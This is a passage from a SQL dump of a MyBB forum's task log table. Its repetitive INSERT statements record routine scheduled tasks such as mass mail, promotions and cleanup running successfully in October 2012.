(`lid`, `tid`, `dateline`, `data`) VALUES ('9658', '9', '1350053726', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9659', '3', '1350054272', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9660', '1', '1350054277', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9661', '7', '1350054287', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9662', '5', '1350054302', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9663', '9', '1350054683', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9664', '5', '1350055518', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9665', '9', '1350057182', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9666', '3', '1350057188', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9667', '5', '1350057192', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9668', '9', '1350057425', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9669', '3', '1350057571', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9670', '1', '1350057609', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9671', '7', '1350057618', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9672', '5', '1350058075', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9673', '9', '1350058293', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9674', '5', '1350059101', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9675', '9', '1350059128', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9676', '3', '1350059409', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9677', '9', '1350060075', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9678', '5', '1350060375', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9679', '9', '1350061006', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9680', '3', '1350061196', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9681', '1', '1350061210', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9682', '7', '1350061262', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9683', '5', '1350061504', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9684', '9', '1350062317', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9685', '5', '1350062770', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9686', '9', '1350062787', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9687', '3', '1350063006', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9688', '9', '1350063622', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9689', '5', '1350063950', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9690', '9', '1350064544', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9691', '3', '1350064763', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9692', '1', '1350064811', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9693', '7', '1350064813', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9694', '5', '1350065190', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9695', '9', '1350065527', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9696', '5', '1350066907', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9697', '9', '1350066966', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9698', '3', '1350067112', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9699', '9', '1350067285', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9700', '5', '1350067502', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9701', '9', '1350068175', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9702', '3', '1350068353', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9703', '1', '1350068428', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9704', '7', '1350068430', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9705', '5', '1350068822', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9706', '9', '1350069429', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9707', '5', '1350070593', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9708', '9', '1350070614', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9709', '3', '1350071122', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9710', '9', '1350071298', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9711', '5', '1350071361', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9712', '9', '1350071777', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9713', '3', '1350071945', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9714', '1', '1350072365', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9715', '7', '1350072378', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9716', '5', '1350072438', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9717', '9', '1350074344', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9718', '5', '1350074423', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9719', '3', '1350074431', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9720', '9', '1350074444', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9721', '5', '1350075031', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9722', '9', '1350076332', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9723', '3', '1350077589', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9724', '1', '1350077711', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9725', '7', '1350077713', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9726', '5', '1350077718', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9727', '9', '1350077985', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9728', '9', '1350078005', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9729', '5', '1350078310', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9730', '9', '1350079048', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9731', '3', '1350079148', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9732', '1', '1350079236', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9733', '7', '1350079307', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9734', '5', '1350079511', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9735', '9', '1350080230', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9736', '5', '1350080760', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9737', '9', '1350080798', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9738', '3', '1350081770', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9739', '9', '1350082395', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9740', '5', '1350082422', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9741', '9', '1350085647', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9742', '3', '1350085652', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9743', '1', '1350085666', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9744', '7', '1350085718', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9745', '5', '1350085921', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9746', '9', '1350086244', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9747', '3', '1350086349', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9748', '1', '1350086488', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9749', '2', '1350086489', 'The daily cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9750', '7', '1350086492', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9751', '11', '1350086495', 'The delayed moderation task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9752', '5', '1350087122', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9753', '9', '1350087716', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9754', '5', '1350088124', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9755', '9', '1350088749', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9756', '3', '1350088784', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9757', '9', '1350089686', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9758', '5', '1350090211', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9759', '9', '1350090796', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9760', '3', '1350090814', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9761', '1', '1350091103', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9762', '7', '1350091225', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9763', '5', '1350091235', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9764', '5', '1350091543', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9765', '9', '1350091972', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9766', '3', '1350092024', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9767', '9', '1350092498', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9768', '5', '1350092702', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9769', '9', '1350093359', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9770', '3', '1350093545', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9771', '1', '1350093601', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9772', '7', '1350093602', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9773', '5', '1350093926', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9774', '9', '1350094233', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9775', '5', '1350095140', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9776', '9', '1350095163', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9777', '3', '1350095484', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9778', '9', '1350096074', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9779', '5', '1350096313', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9780', '9', '1350096960', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9781', '3', '1350097164', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9782', '1', '1350097299', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9783', '7', '1350097523', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9784', '5', '1350097547', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9785', '9', '1350098006', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9786', '5', '1350098762', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9787', '9', '1350098796', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9788', '3', '1350099019', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9789', '9', '1350099638', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9790', '5', '1350099912', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9791', '9', '1350100560', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9792', '3', '1350100784', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9793', '1', '1350100804', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9794', '7', '1350100818', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9795', '5', '1350101183', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9796', '9', '1350101460', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9797', '5', '1350102323', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9798', '9', '1350102345', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9799', '3', '1350102617', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9800', '9', '1350103262', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9801', '5', '1350103582', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9802', '9', '1350105020', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9803', '3', '1350105068', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9804', '1', '1350105083', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9805', '7', '1350105092', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9806', '5', '1350106153', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9807', '9', '1350107131', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9808', '3', '1350108279', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9809', '5', '1350108294', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9810', '9', '1350108310', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9811', '1', '1350109536', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9812', '7', '1350109675', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9813', '5', '1350109683', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9814', '9', '1350109763', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9815', '3', '1350110353', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9816', '9', '1350110633', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9817', '5', '1350111023', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9818', '9', '1350111335', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9819', '3', '1350111597', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9820', '1', '1350111610', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9821', '7', '1350111703', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9822', '5', '1350111914', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9823', '9', '1350112365', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9824', '5', '1350113108', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9825', '9', '1350113120', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9826', '3', '1350113422', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9827', '9', '1350114060', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9828', '5', '1350114331', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9829', '9', '1350115484', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9830', '3', '1350115491', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9831', '1', '1350115502', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9832', '7', '1350115512', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9833', '5', '1350115554', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9834', '9', '1350115830', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9835', '5', '1350116706', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9836', '9', '1350116733', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9837', '3', '1350117049', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9838', '9', '1350117973', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9839', '5', '1350117989', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9840', '9', '1350118535', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9841', '3', '1350118996', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9842', '1', '1350119004', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9843', '7', '1350119014', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9844', '5', '1350119123', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9845', '9', '1350119449', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9846', '5', '1350120345', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9847', '9', '1350120380', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9848', '3', '1350120609', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9849', '9', '1350121248', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9850', '5', '1350121503', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9851', '9', '1350122112', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9852', '3', '1350122547', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9853', '1', '1350122552', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9854', '7', '1350122563', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9855', '5', '1350122812', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9856', '9', '1350123694', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9857', '5', '1350124021', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9858', '9', '1350124031', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9859', '3', '1350124203', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9860', '9', '1350124815', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9861', '5', '1350125103', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9862', '9', '1350125707', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9863', '3', 